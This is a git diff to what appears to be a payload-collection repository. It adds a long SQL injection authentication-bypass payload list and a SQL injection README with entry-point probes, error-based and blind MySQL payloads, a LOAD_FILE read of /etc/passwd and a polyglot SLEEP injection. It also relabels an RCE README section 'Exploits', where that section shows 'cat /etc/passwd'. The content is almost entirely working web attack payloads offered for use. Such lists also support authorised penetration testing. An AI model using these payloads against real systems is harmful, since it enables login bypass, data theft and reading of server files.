diff --git a/RCE/README.md b/RCE/README.md
index 9668908..b312836 100644
--- a/RCE/README.md
+++ b/RCE/README.md
@@ -2,7 +2,7 @@
 Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.
 	
 
-## Vuln
+## Exploits
 Normal code execution
 ```
 cat /etc/passwd 
diff --git a/SQL_Injection/Authentication Bypass.txt b/SQL_Injection/Authentication Bypass.txt
new file mode 100755
index 0000000..527b2b2
--- /dev/null
+++ b/SQL_Injection/Authentication Bypass.txt	
@@ -0,0 +1,77 @@
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
+or 1=1
+or 1=1-- 
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
\ No newline at end of file
diff --git a/SQL_Injection/README.md b/SQL_Injection/README.md
index c707ab4..01e42a5 100644
--- a/SQL_Injection/README.md
+++ b/SQL_Injection/README.md
@@ -1,12 +1,58 @@
-# Title
-Lorem	
+# SQL injection
+A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application	
 
-## Vuln
+## Exploit
 
+Detection of an SQL injection entry point
 ```
-Code
+'
+"
+%27
+" / %22
+; / %3B
+%%2727
+%25%27
+`+HERP
+'||'DERP
+'+'herp
+' ' DERP
+Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
+transformed into U+0022 QUOTATION MARK (")
+Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
+transformed into U+0027 APOSTROPHE (')
+```
+
+
+Authentication bypass - use the file "Authentication Bypass.txt"
+```
+SELECT id FROM users WHERE username='input1' AND password='input2'
+SELECT id FROM users WHERE username='' or true-- AND password='input2'
+```
+
+
+MySQL Error Based
+```
+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
+'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
+```
+
+
+MySQL Blind SQL
+```
++BENCHMARK(40000000,SHA1(1337))+
+```
+
+
+MySQL Read content of a file
+```
+' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
+```
+
+
+Polyglot injection (multicontext)
+```
+SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 ```
 
 ## Thanks to
-* Lorem
-* Ipsum
\ No newline at end of file
+* http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
\ No newline at end of file